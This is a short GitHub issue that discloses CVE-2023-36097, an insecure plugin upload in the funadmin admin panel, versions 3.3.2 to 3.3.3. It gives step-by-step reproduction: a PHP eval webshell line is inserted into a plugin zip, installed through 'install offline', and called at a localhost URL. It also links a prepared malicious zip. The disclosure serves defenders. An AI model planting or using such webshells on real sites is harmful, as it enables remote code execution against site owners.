CVE-2023-36097: Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3 · Issue #17 · funadmin/funadmin

Vulnerability Product:funadmin
Vulnerability version:.3.3.2 - 3.3.3
Vulnerability type:Insecure file upload
Vulnerability Details：
Vulnerability location app\backend\controller\Addon.php#localinstall method

the method:localinstall doesn’t check any webshell or sensitive function in file, which may cause insecure file upload.

firstly, we download a free plugin and unzip it. the rootpath of plugin is as follows:

then, we add a webshell into /public/js

content of shell: <?pup @eval($_REQUEST[‘shell’]); ?>
after it, we zip the entire plugin

example plugin(already placed webshell): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip

finally, we just find a website uses funadmin v3.3.2, visit: http://localhost/backend/index/index.html, click “install offline” “离线安装”

and select the plugin we just zipped, after installed , visit http://localhost/static/demo/js/shell.php?shell=phpinfo();

Proof that this has been uploaded webshell via plugins install

Discoverer:leeya_bug